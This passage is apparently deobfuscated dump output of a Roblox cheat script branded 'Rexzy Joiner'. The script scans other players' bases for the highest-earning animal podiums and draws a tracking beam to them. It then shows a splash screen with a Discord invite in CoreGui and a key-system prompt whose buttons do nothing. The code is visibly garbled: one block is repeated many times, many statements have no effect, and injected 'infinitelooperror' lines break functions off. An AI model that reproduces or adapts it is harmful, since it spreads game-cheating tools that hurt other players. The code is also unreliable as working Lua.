    for _1294, _1294_2 in pairs(_call10:FindFirstChild('Plots'):GetChildren())do
        _1294_2:IsA('Model')

        for _1299, _1299_2 in pairs(_1294_2:GetDescendants())do
            _1299_2:IsA('TextLabel')

            local _ = _1299_2.Text == _LocalPlayer13.Name .. "'s Base"
        end
        for _1310, _1310_2 in pairs(_1294_2:FindFirstChild('AnimalPodiums'):GetChildren())do
            local _call1312 = _1310_2:FindFirstChild('Base', true)
            local _call1320 = _call1312:FindFirstChild('Spawn', true):FindFirstChild('Attachment', true):FindFirstChild('AnimalOverhead', true):FindFirstChild('Generation')

            _call1320:IsA('TextLabel')

            local _Text1323 = _call1320.Text

            string.find(_Text1323, '%$')

            local _call1331 = tostring(_Text1323):gsub(',', ''):gsub('%$', ''):match('^%s*(.-)%s*$')

            _call1331:match('/[sS]')
            _call1331:gsub('/[sS]', ''):match('^(%d+)%s*[mM]%s+(%d+)%s*[sS]$')
        end
    end

    local _ = _call1228 == _call1312

    _call1265:Destroy()

    local _call1343 = _LocalPlayer13.Character:FindFirstChild('HumanoidRootPart')
    local _call1345 = Instance.new('Attachment')

    _call1345.Parent = _call1343
    _call1345.Name = 'BeamOrigin'

    local _call1347 = Instance.new('Attachment')

    _call1347.Parent = _call1312
    _call1347.Name = 'BeamTarget'

    local _call1349 = Instance.new('Beam')

    _call1349.Attachment0 = _call1345
    _call1349.Attachment1 = _call1347
    _call1349.Color = ColorSequence.new(Color3.fromRGB(255, 0, 0), Color3.fromRGB(255, 255, 0))
    _call1349.Width0 = 0.5
    _call1349.Width1 = 0.5
    _call1349.FaceCamera = true
    _call1349.Transparency = NumberSequence.new(0.3)
    _call1349.LightEmission = 1
    _call1349.Parent = _call1343

    for _1362, _1362_2 in pairs(_call10:FindFirstChild('Plots'):GetChildren())do
        _1362_2:IsA('Model')

        for _1367, _1367_2 in pairs(_1362_2:GetDescendants())do
            _1367_2:IsA('TextLabel')

            local _ = _1367_2.Text == _LocalPlayer13.Name .. "'s Base"
        end
    end

    task.wait(5)

    for _1378, _1378_2 in pairs(_call10:FindFirstChild('Plots'):GetChildren())do
        _1378_2:IsA('Model')

        for _1383, _1383_2 in pairs(_1378_2:GetDescendants())do
            _1383_2:IsA('TextLabel')

            local _ = _1383_2.Text == _LocalPlayer13.Name .. "'s Base"
        end
        for _1394, _1394_2 in pairs(_1378_2:FindFirstChild('AnimalPodiums'):GetChildren())do
            local _call1396 = _1394_2:FindFirstChild('Base', true)
            local _call1404 = _call1396:FindFirstChild('Spawn', true):FindFirstChild('Attachment', true):FindFirstChild('AnimalOverhead', true):FindFirstChild('Generation')

            _call1404:IsA('TextLabel')

            local _Text1407 = _call1404.Text

            string.find(_Text1407, '%$')

            local _call1415 = tostring(_Text1407):gsub(',', ''):gsub('%$', ''):match('^%s*(.-)%s*$')

            _call1415:match('/[sS]')
            _call1415:gsub('/[sS]', ''):match('^(%d+)%s*[mM]%s+(%d+)%s*[sS]$')
        end
    end

    local _ = _call1312 == _call1396

    _call1349:Destroy()

    local _call1427 = _LocalPlayer13.Character:FindFirstChild('HumanoidRootPart')
    local _call1429 = Instance.new('Attachment')

    _call1429.Parent = _call1427
    _call1429.Name = 'BeamOrigin'

    local _call1431 = Instance.new('Attachment')

    _call1431.Parent = _call1396
    _call1431.Name = 'BeamTarget'

    local _call1433 = Instance.new('Beam')

    _call1433.Attachment0 = _call1429
    _call1433.Attachment1 = _call1431
    _call1433.Color = ColorSequence.new(Color3.fromRGB(255, 0, 0), Color3.fromRGB(255, 255, 0))
    _call1433.Width0 = 0.5
    _call1433.Width1 = 0.5
    _call1433.FaceCamera = true
    _call1433.Transparency = NumberSequence.new(0.3)
    _call1433.LightEmission = 1
    _call1433.Parent = _call1427

    for _1446, _1446_2 in pairs(_call10:FindFirstChild('Plots'):GetChildren())do
        _1446_2:IsA('Model')

        for _1451, _1451_2 in pairs(_1446_2:GetDescendants())do
            _1451_2:IsA('TextLabel')

            local _ = _1451_2.Text == _LocalPlayer13.Name .. "'s Base"
        end
    end

    task.wait(5)

    for _1462, _1462_2 in pairs(_call10:FindFirstChild('Plots'):GetChildren())do
        _1462_2:IsA('Model')

        for _1467, _1467_2 in pairs(_1462_2:GetDescendants())do
            _1467_2:IsA('TextLabel')

            local _ = _1467_2.Text == _LocalPlayer13.Name .. "'s Base"
        end
        for _1478, _1478_2 in pairs(_1462_2:FindFirstChild('AnimalPodiums'):GetChildren())do
            local _call1480 = _1478_2:FindFirstChild('Base', true)
            local _call1488 = _call1480:FindFirstChild('Spawn', true):FindFirstChild('Attachment', true):FindFirstChild('AnimalOverhead', true):FindFirstChild('Generation')

            _call1488:IsA('TextLabel')

            local _Text1491 = _call1488.Text

            string.find(_Text1491, '%$')

            local _call1499 = tostring(_Text1491):gsub(',', ''):gsub('%$', ''):match('^%s*(.-)%s*$')

            _call1499:match('/[sS]')
            _call1499:gsub('/[sS]', ''):match('^(%d+)%s*[mM]%s+(%d+)%s*[sS]$')
        end
    end

    local _ = _call1396 == _call1480

    _call1433:Destroy()

    local _call1511 = _LocalPlayer13.Character:FindFirstChild('HumanoidRootPart')
    local _call1513 = Instance.new('Attachment')

    _call1513.Parent = _call1511
    _call1513.Name = 'BeamOrigin'

    local _call1515 = Instance.new('Attachment')

    _call1515.Parent = _call1480
    _call1515.Name = 'BeamTarget'

    local _call1517 = Instance.new('Beam')

    _call1517.Attachment0 = _call1513
    _call1517.Attachment1 = _call1515
    _call1517.Color = ColorSequence.new(Color3.fromRGB(255, 0, 0), Color3.fromRGB(255, 255, 0))
    _call1517.Width0 = 0.5
    _call1517.Width1 = 0.5
    _call1517.FaceCamera = true
    _call1517.Transparency = NumberSequence.new(0.3)
    _call1517.LightEmission = 1
    _call1517.Parent = _call1511

    for _1530, _1530_2 in pairs(_call10:FindFirstChild('Plots'):GetChildren())do
        _1530_2:IsA('Model')

        for _1535, _1535_2 in pairs(_1530_2:GetDescendants())do
            _1535_2:IsA('TextLabel')

            local _ = _1535_2.Text == _LocalPlayer13.Name .. "'s Base"
        end
    end

    task.wait(5)

    for _1546, _1546_2 in pairs(_call10:FindFirstChild('Plots'):GetChildren())do
        _1546_2:IsA('Model')

        for _1551, _1551_2 in pairs(_1546_2:GetDescendants())do
            _1551_2:IsA('TextLabel')

            local _ = _1551_2.Text == _LocalPlayer13.Name .. "'s Base"
        end
        for _1562, _1562_2 in pairs(_1546_2:FindFirstChild('AnimalPodiums'):GetChildren())do
            local _call1564 = _1562_2:FindFirstChild('Base', true)
            local _call1572 = _call1564:FindFirstChild('Spawn', true):FindFirstChild('Attachment', true):FindFirstChild('AnimalOverhead', true):FindFirstChild('Generation')

            _call1572:IsA('TextLabel')

            local _Text1575 = _call1572.Text

            string.find(_Text1575, '%$')

            local _call1583 = tostring(_Text1575):gsub(',', ''):gsub('%$', ''):match('^%s*(.-)%s*$')

            _call1583:match('/[sS]')
            _call1583:gsub('/[sS]', ''):match('^(%d+)%s*[mM]%s+(%d+)%s*[sS]$')
        end
    end

    local _ = _call1480 == _call1564

    _call1517:Destroy()

    local _call1595 = _LocalPlayer13.Character:FindFirstChild('HumanoidRootPart')
    local _call1597 = Instance.new('Attachment')

    _call1597.Parent = _call1595
    _call1597.Name = 'BeamOrigin'

    local _call1599 = Instance.new('Attachment')

    _call1599.Parent = _call1564
    _call1599.Name = 'BeamTarget'

    local _call1601 = Instance.new('Beam')

    _call1601.Attachment0 = _call1597
    _call1601.Attachment1 = _call1599
    _call1601.Color = ColorSequence.new(Color3.fromRGB(255, 0, 0), Color3.fromRGB(255, 255, 0))
    _call1601.Width0 = 0.5
    _call1601.Width1 = 0.5
    _call1601.FaceCamera = true
    _call1601.Transparency = NumberSequence.new(0.3)
    _call1601.LightEmission = 1
    _call1601.Parent = _call1595

    for _1614, _1614_2 in pairs(_call10:FindFirstChild('Plots'):GetChildren())do
        _1614_2:IsA('Model')

        for _1619, _1619_2 in pairs(_1614_2:GetDescendants())do
            _1619_2:IsA('TextLabel')

            local _ = _1619_2.Text == _LocalPlayer13.Name .. "'s Base"
        end
    end

    task.wait(5)

    for _1630, _1630_2 in pairs(_call10:FindFirstChild('Plots'):GetChildren())do
        _1630_2:IsA('Model')

        for _1635, _1635_2 in pairs(_1630_2:GetDescendants())do
            _1635_2:IsA('TextLabel')

            local _ = _1635_2.Text == _LocalPlayer13.Name .. "'s Base"
        end
        for _1646, _1646_2 in pairs(_1630_2:FindFirstChild('AnimalPodiums'):GetChildren())do
            local _call1648 = _1646_2:FindFirstChild('Base', true)
            local _call1656 = _call1648:FindFirstChild('Spawn', true):FindFirstChild('Attachment', true):FindFirstChild('AnimalOverhead', true):FindFirstChild('Generation')

            _call1656:IsA('TextLabel')

            local _Text1659 = _call1656.Text

            string.find(_Text1659, '%$')

            local _call1667 = tostring(_Text1659):gsub(',', ''):gsub('%$', ''):match('^%s*(.-)%s*$')

            _call1667:match('/[sS]')
            _call1667:gsub('/[sS]', ''):match('^(%d+)%s*[mM]%s+(%d+)%s*[sS]$')
        end
    end

    local _ = _call1564 == _call1648

    _call1601:Destroy()

    local _call1679 = _LocalPlayer13.Character:FindFirstChild('HumanoidRootPart')
    local _call1681 = Instance.new('Attachment')

    _call1681.Parent = _call1679
    _call1681.Name = 'BeamOrigin'

    local _call1683 = Instance.new('Attachment')

    _call1683.Parent = _call1648
    _call1683.Name = 'BeamTarget'

    local _call1685 = Instance.new('Beam')

    _call1685.Attachment0 = _call1681
    _call1685.Attachment1 = _call1683
    _call1685.Color = ColorSequence.new(Color3.fromRGB(255, 0, 0), Color3.fromRGB(255, 255, 0))
    _call1685.Width0 = 0.5
    _call1685.Width1 = 0.5
    _call1685.FaceCamera = true
    _call1685.Transparency = NumberSequence.new(0.3)
    _call1685.LightEmission = 1
    _call1685.Parent = _call1679

    for _1698, _1698_2 in pairs(_call10:FindFirstChild('Plots'):GetChildren())do
        _1698_2:IsA('Model')

        for _1703, _1703_2 in pairs(_1698_2:GetDescendants())do
            _1703_2:IsA('TextLabel')

            local _ = _1703_2.Text == _LocalPlayer13.Name .. "'s Base"
        end
    end

    task.wait(5)

    for _1714, _1714_2 in pairs(_call10:FindFirstChild('Plots'):GetChildren())do
        _1714_2:IsA('Model')

        for _1719, _1719_2 in pairs(_1714_2:GetDescendants())do
            _1719_2:IsA('TextLabel')

            local _ = _1719_2.Text == _LocalPlayer13.Name .. "'s Base"
        end
        for _1730, _1730_2 in pairs(_1714_2:FindFirstChild('AnimalPodiums'):GetChildren())do
            local _call1732 = _1730_2:FindFirstChild('Base', true)
            local _call1740 = _call1732:FindFirstChild('Spawn', true):FindFirstChild('Attachment', true):FindFirstChild('AnimalOverhead', true):FindFirstChild('Generation')

            _call1740:IsA('TextLabel')

            local _Text1743 = _call1740.Text

            string.find(_Text1743, '%$')

            local _call1751 = tostring(_Text1743):gsub(',', ''):gsub('%$', ''):match('^%s*(.-)%s*$')

            _call1751:match('/[sS]')
            _call1751:gsub('/[sS]', ''):match('^(%d+)%s*[mM]%s+(%d+)%s*[sS]$')
        end
    end

    local _ = _call1648 == _call1732

    _call1685:Destroy()

    local _call1763 = _LocalPlayer13.Character:FindFirstChild('HumanoidRootPart')
    local _call1765 = Instance.new('Attachment')

    _call1765.Parent = _call1763
    _call1765.Name = 'BeamOrigin'

    local _call1767 = Instance.new('Attachment')

    _call1767.Parent = _call1732
    _call1767.Name = 'BeamTarget'

    local _call1769 = Instance.new('Beam')

    _call1769.Attachment0 = _call1765
    _call1769.Attachment1 = _call1767
    _call1769.Color = ColorSequence.new(Color3.fromRGB(255, 0, 0), Color3.fromRGB(255, 255, 0))
    _call1769.Width0 = 0.5
    _call1769.Width1 = 0.5
    _call1769.FaceCamera = true
    _call1769.Transparency = NumberSequence.new(0.3)
    _call1769.LightEmission = 1
    _call1769.Parent = _call1763

    for _1782, _1782_2 in pairs(_call10:FindFirstChild('Plots'):GetChildren())do
        _1782_2:IsA('Model')

        for _1787, _1787_2 in pairs(_1782_2:GetDescendants())do
            _1787_2:IsA('TextLabel')

            local _ = _1787_2.Text == _LocalPlayer13.Name .. "'s Base"
        end
    end

    task.wait(5)

    for _1798, _1798_2 in pairs(_call10:FindFirstChild('Plots'):GetChildren())do
        _1798_2:IsA('Model')

        for _1803, _1803_2 in pairs(_1798_2:GetDescendants())do
            _1803_2:IsA('TextLabel')

            local _ = _1803_2.Text == _LocalPlayer13.Name .. "'s Base"
        end
        for _1814, _1814_2 in pairs(_1798_2:FindFirstChild('AnimalPodiums'):GetChildren())do
            local _call1816 = _1814_2:FindFirstChild('Base', true)
            local _call1824 = _call1816:FindFirstChild('Spawn', true):FindFirstChild('Attachment', true):FindFirstChild('AnimalOverhead', true):FindFirstChild('Generation')

            _call1824:IsA('TextLabel')

            local _Text1827 = _call1824.Text

            string.find(_Text1827, '%$')

            local _call1835 = tostring(_Text1827):gsub(',', ''):gsub('%$', ''):match('^%s*(.-)%s*$')

            _call1835:match('/[sS]')
            _call1835:gsub('/[sS]', ''):match('^(%d+)%s*[mM]%s+(%d+)%s*[sS]$')
        end
    end

    local _ = _call1732 == _call1816

    _call1769:Destroy()

    local _call1847 = _LocalPlayer13.Character:FindFirstChild('HumanoidRootPart')
    local _call1849 = Instance.new('Attachment')

    _call1849.Parent = _call1847
    _call1849.Name = 'BeamOrigin'

    local _call1851 = Instance.new('Attachment')

    _call1851.Parent = _call1816
    _call1851.Name = 'BeamTarget'

    local _call1853 = Instance.new('Beam')

    _call1853.Attachment0 = _call1849
    _call1853.Attachment1 = _call1851
    _call1853.Color = ColorSequence.new(Color3.fromRGB(255, 0, 0), Color3.fromRGB(255, 255, 0))
    _call1853.Width0 = 0.5
    _call1853.Width1 = 0.5
    _call1853.FaceCamera = true
    _call1853.Transparency = NumberSequence.new(0.3)
    _call1853.LightEmission = 1
    _call1853.Parent = _call1847

    for _1866, _1866_2 in pairs(_call10:FindFirstChild('Plots'):GetChildren())do
        _1866_2:IsA('Model')

        for _1871, _1871_2 in pairs(_1866_2:GetDescendants())do
            _1871_2:IsA('TextLabel')

            local _ = _1871_2.Text == _LocalPlayer13.Name .. "'s Base"
        end
    end

    task.wait(5)

    for _1882, _1882_2 in pairs(_call10:FindFirstChild('Plots'):GetChildren())do
        _1882_2:IsA('Model')

        for _1887, _1887_2 in pairs(_1882_2:GetDescendants())do
            _1887_2:IsA('TextLabel')

            local _ = _1887_2.Text == _LocalPlayer13.Name .. "'s Base"
        end
        for _1898, _1898_2 in pairs(_1882_2:FindFirstChild('AnimalPodiums'):GetChildren())do
            local _call1900 = _1898_2:FindFirstChild('Base', true)
            local _call1908 = _call1900:FindFirstChild('Spawn', true):FindFirstChild('Attachment', true):FindFirstChild('AnimalOverhead', true):FindFirstChild('Generation')

            _call1908:IsA('TextLabel')

            local _Text1911 = _call1908.Text

            string.find(_Text1911, '%$')

            local _call1919 = tostring(_Text1911):gsub(',', ''):gsub('%$', ''):match('^%s*(.-)%s*$')

            _call1919:match('/[sS]')
            _call1919:gsub('/[sS]', ''):match('^(%d+)%s*[mM]%s+(%d+)%s*[sS]$')
        end
    end

    local _ = _call1816 == _call1900

    _call1853:Destroy()

    local _call1931 = _LocalPlayer13.Character:FindFirstChild('HumanoidRootPart')
    local _call1933 = Instance.new('Attachment')

    _call1933.Parent = _call1931
    _call1933.Name = 'BeamOrigin'

    local _call1935 = Instance.new('Attachment')

    _call1935.Parent = _call1900
    _call1935.Name = 'BeamTarget'

    local _call1937 = Instance.new('Beam')

    _call1937.Attachment0 = _call1933
    _call1937.Attachment1 = _call1935
    _call1937.Color = ColorSequence.new(Color3.fromRGB(255, 0, 0), Color3.fromRGB(255, 255, 0))
    _call1937.Width0 = 0.5
    _call1937.Width1 = 0.5
    _call1937.FaceCamera = true
    _call1937.Transparency = NumberSequence.new(0.3)
    _call1937.LightEmission = 1
    _call1937.Parent = _call1931

    for _1950, _1950_2 in pairs(_call10:FindFirstChild('Plots'):GetChildren())do
        _1950_2:IsA('Model')

        for _1955, _1955_2 in pairs(_1950_2:GetDescendants())do
            _1955_2:IsA('TextLabel')

            local _ = _1955_2.Text == _LocalPlayer13.Name .. "'s Base"
        end
    end

    task.wait(5)

    for _1966, _1966_2 in pairs(_call10:FindFirstChild('Plots'):GetChildren())do
        _1966_2:IsA('Model')

        for _1971, _1971_2 in pairs(_1966_2:GetDescendants())do
            _1971_2:IsA('TextLabel')

            local _ = _1971_2.Text == _LocalPlayer13.Name .. "'s Base"
        end
        for _1982, _1982_2 in pairs(_1966_2:FindFirstChild('AnimalPodiums'):GetChildren())do
            local _call1984 = _1982_2:FindFirstChild('Base', true)
            local _call1992 = _call1984:FindFirstChild('Spawn', true):FindFirstChild('Attachment', true):FindFirstChild('AnimalOverhead', true):FindFirstChild('Generation')

            _call1992:IsA('TextLabel')

            local _Text1995 = _call1992.Text

            string.find(_Text1995, '%$')

            local _call2003 = tostring(_Text1995):gsub(',', ''):gsub('%$', ''):match('^%s*(.-)%s*$')

            _call2003:match('/[sS]')
            _call2003:gsub('/[sS]', ''):match('^(%d+)%s*[mM]%s+(%d+)%s*[sS]$')
        end
    end

    local _ = _call1900 == _call1984

    _call1937:Destroy()

    local _call2015 = _LocalPlayer13.Character:FindFirstChild('HumanoidRootPart')
    local _call2017 = Instance.new('Attachment')

    _call2017.Parent = _call2015
    _call2017.Name = 'BeamOrigin'

    local _call2019 = Instance.new('Attachment')

    _call2019.Parent = _call1984
    _call2019.Name = 'BeamTarget'

    local _call2021 = Instance.new('Beam')

    _call2021.Attachment0 = _call2017
    _call2021.Attachment1 = _call2019
    _call2021.Color = ColorSequence.new(Color3.fromRGB(255, 0, 0), Color3.fromRGB(255, 255, 0))
    _call2021.Width0 = 0.5
    _call2021.Width1 = 0.5
    _call2021.FaceCamera = true
    _call2021.Transparency = NumberSequence.new(0.3)
    _call2021.LightEmission = 1
    _call2021.Parent = _call2015

    for _2034, _2034_2 in pairs(_call10:FindFirstChild('Plots'):GetChildren())do
        _2034_2:IsA('Model')

        for _2039, _2039_2 in pairs(_2034_2:GetDescendants())do
            _2039_2:IsA('TextLabel')

            local _ = _2039_2.Text == _LocalPlayer13.Name .. "'s Base"
        end
    end

    task.wait(5)

    for _2050, _2050_2 in pairs(_call10:FindFirstChild('Plots'):GetChildren())do
        _2050_2:IsA('Model')

        for _2055, _2055_2 in pairs(_2050_2:GetDescendants())do
            _2055_2:IsA('TextLabel')

            local _ = _2055_2.Text == _LocalPlayer13.Name .. "'s Base"
        end
        for _2066, _2066_2 in pairs(_2050_2:FindFirstChild('AnimalPodiums'):GetChildren())do
            local _call2068 = _2066_2:FindFirstChild('Base', true)
            local _call2076 = _call2068:FindFirstChild('Spawn', true):FindFirstChild('Attachment', true):FindFirstChild('AnimalOverhead', true):FindFirstChild('Generation')

            _call2076:IsA('TextLabel')

            local _Text2079 = _call2076.Text

            string.find(_Text2079, '%$')

            local _call2087 = tostring(_Text2079):gsub(',', ''):gsub('%$', ''):match('^%s*(.-)%s*$')

            _call2087:match('/[sS]')
            _call2087:gsub('/[sS]', ''):match('^(%d+)%s*[mM]%s+(%d+)%s*[sS]$')
        end
    end

    local _ = _call1984 == _call2068

    _call2021:Destroy()

    local _call2099 = _LocalPlayer13.Character:FindFirstChild('HumanoidRootPart')
    local _call2101 = Instance.new('Attachment')

    _call2101.Parent = _call2099
    _call2101.Name = 'BeamOrigin'

    local _call2103 = Instance.new('Attachment')

    _call2103.Parent = _call2068
    _call2103.Name = 'BeamTarget'

    local _call2105 = Instance.new('Beam')

    _call2105.Attachment0 = _call2101
    _call2105.Attachment1 = _call2103
    _call2105.Color = ColorSequence.new(Color3.fromRGB(255, 0, 0), Color3.fromRGB(255, 255, 0))
    _call2105.Width0 = 0.5
    _call2105.Width1 = 0.5
    _call2105.FaceCamera = true
    _call2105.Transparency = NumberSequence.new(0.3)
    _call2105.LightEmission = 1
    _call2105.Parent = _call2099

    for _2118, _2118_2 in pairs(_call10:FindFirstChild('Plots'):GetChildren())do
        _2118_2:IsA('Model')

        for _2123, _2123_2 in pairs(_2118_2:GetDescendants())do
            _2123_2:IsA('TextLabel')

            local _ = _2123_2.Text == _LocalPlayer13.Name .. "'s Base"
        end
    end

    task.wait(5)

    for _2134, _2134_2 in pairs(_call10:FindFirstChild('Plots'):GetChildren())do
        _2134_2:IsA('Model')

        for _2139, _2139_2 in pairs(_2134_2:GetDescendants())do
            _2139_2:IsA('TextLabel')

            local _ = _2139_2.Text == _LocalPlayer13.Name .. "'s Base"
        end
        for _2150, _2150_2 in pairs(_2134_2:FindFirstChild('AnimalPodiums'):GetChildren())do
            local _call2160 = _2150_2:FindFirstChild('Base', true):FindFirstChild('Spawn', true):FindFirstChild('Attachment', true):FindFirstChild('AnimalOverhead', true):FindFirstChild('Generation')

            _call2160:IsA('TextLabel')

            local _Text2163 = _call2160.Text

            string.find(_Text2163, '%$')
            tostring(_Text2163):gsub(',', '')
            error('internal 550: <25ms: infinitelooperror>')
        end
    end
end)

fenv.updateLogsDisplay = function(_2169, _2169_2, _2169_3, _2169_4, _2169_5) end

local _call2171 = Instance.new('ScreenGui')

_call2171.Name = 'SplashScreen'
_call2171.IgnoreGuiInset = true
_call2171.Parent = game:GetService('CoreGui')

local _call2175 = Instance.new('Frame')

_call2175.Size = UDim2.new(1, 0, 1, 0)
_call2175.BackgroundColor3 = Color3.new(0, 0, 0)
_call2175.BorderSizePixel = 0
_call2175.Parent = _call2171

local _call2181 = Instance.new('TextLabel')

_call2181.Size = UDim2.new(1, 0, 0, 50)
_call2181.Position = UDim2.new(0, 0, 0.05, 0)
_call2181.BackgroundTransparency = 1
_call2181.TextColor3 = Color3.fromRGB(255, 255, 255)
_call2181.Font = Enum.Font.GothamBold
_call2181.TextSize = 22
_call2181.Text = 'If you paid for this, you got scammed'
_call2181.Parent = _call2175

local _call2191 = Instance.new('TextLabel')

_call2191.Size = UDim2.new(1, 0, 0, 70)
_call2191.Position = UDim2.new(0, 0, 0.4, 0)
_call2191.BackgroundTransparency = 1
_call2191.TextColor3 = Color3.fromRGB(255, 255, 255)
_call2191.Font = Enum.Font.GothamBlack
_call2191.TextSize = 36
_call2191.Text = 'Rexzy Joiner'
_call2191.Parent = _call2175

local _call2201 = Instance.new('TextLabel')

_call2201.Size = UDim2.new(1, 0, 0, 40)
_call2201.Position = UDim2.new(0, 0, 0.55, 0)
_call2201.BackgroundTransparency = 1
_call2201.TextColor3 = Color3.fromRGB(200, 200, 255)
_call2201.Font = Enum.Font.GothamBold
_call2201.TextSize = 20
_call2201.Text = 'discord.gg/joiner'
_call2201.Parent = _call2175

local _call2211 = Instance.new('TextLabel')

_call2211.Size = UDim2.new(1, 0, 0, 40)
_call2211.Position = UDim2.new(0, 0, 0.9, 0)
_call2211.BackgroundTransparency = 1
_call2211.TextColor3 = Color3.fromRGB(255, 255, 255)
_call2211.Font = Enum.Font.Gotham
_call2211.TextSize = 18
_call2211.Text = 'This will disappear in 10'
_call2211.Parent = _call2175

task.spawn(function()
    _call2211.Text = 'This will disappear in 10'

    task.wait(1)

    _call2211.Text = 'This will disappear in 9'

    error('internal 550: <25ms: infinitelooperror>')
end)
end

task.wait(5)

local _call2224 = Instance.new('ScreenGui')

_call2224.Name = 'RexzyKeySystem'
_call2224.Parent = _LocalPlayer3:WaitForChild('PlayerGui')

local _call2229 = Instance.new('BlurEffect', game.Lighting)

_call2229.Size = 10

local _call2231 = Instance.new('Frame', _call2224)

_call2231.Size = UDim2.new(0, 350, 0, 200)
_call2231.Position = UDim2.new(0.5, -175, 0.5, -100)
_call2231.BackgroundColor3 = Color3.fromRGB(25, 25, 25)
_call2231.Active = true
_call2231.Draggable = true

local _call2239 = Instance.new('UICorner', _call2231)

_call2239.CornerRadius = UDim.new(0, 15)

local _call2243 = Instance.new('TextLabel', _call2231)

_call2243.Text = 'Rexzy 1\u{2013}999 Key System'
_call2243.Size = UDim2.new(1, 0, 0, 40)
_call2243.BackgroundTransparency = 1
_call2243.TextColor3 = Color3.fromRGB(255, 255, 255)
_call2243.Font = Enum.Font.GothamBold
_call2243.TextSize = 20

local _call2251 = Instance.new('TextBox', _call2231)

_call2251.Text = ''
_call2251.PlaceholderText = 'Paste key'
_call2251.PlaceholderColor3 = Color3.fromRGB(180, 180, 180)
_call2251.Size = UDim2.new(0.8, 0, 0, 40)
_call2251.Position = UDim2.new(0.1, 0, 0.35, 0)
_call2251.BackgroundColor3 = Color3.fromRGB(40, 40, 40)
_call2251.TextColor3 = Color3.fromRGB(255, 255, 255)
_call2251.Font = Enum.Font.Gotham
_call2251.TextSize = 16

local _call2265 = Instance.new('UICorner', _call2251)

_call2265.CornerRadius = UDim.new(0, 8)

local _call2269 = Instance.new('TextButton', _call2231)

_call2269.Text = 'Get Key'
_call2269.Size = UDim2.new(0.35, 0, 0, 40)
_call2269.Position = UDim2.new(0.1, 0, 0.7, 0)
_call2269.BackgroundColor3 = Color3.fromRGB(0, 170, 255)
_call2269.TextColor3 = Color3.fromRGB(255, 255, 255)
_call2269.Font = Enum.Font.GothamBold
_call2269.TextSize = 16

local _call2281 = Instance.new('UICorner', _call2269)

_call2281.CornerRadius = UDim.new(0, 8)

local _call2285 = Instance.new('TextButton', _call2231)

_call2285.Text = 'Check Key'
_call2285.Size = UDim2.new(0.35, 0, 0, 40)
_call2285.Position = UDim2.new(0.55, 0, 0.7, 0)
_call2285.BackgroundColor3 = Color3.fromRGB(0, 255, 127)
_call2285.TextColor3 = Color3.fromRGB(255, 255, 255)
_call2285.Font = Enum.Font.GothamBold
_call2285.TextSize = 16

local _call2297 = Instance.new('UICorner', _call2285)

_call2297.CornerRadius = UDim.new(0, 8)

_call2269.MouseButton1Click:Connect(function(_2303, _2303_2, _2303_3, _2303_4) end)
_call2285.MouseButton1Click:Connect(function(_2307, _2307_2, _2307_3) end)
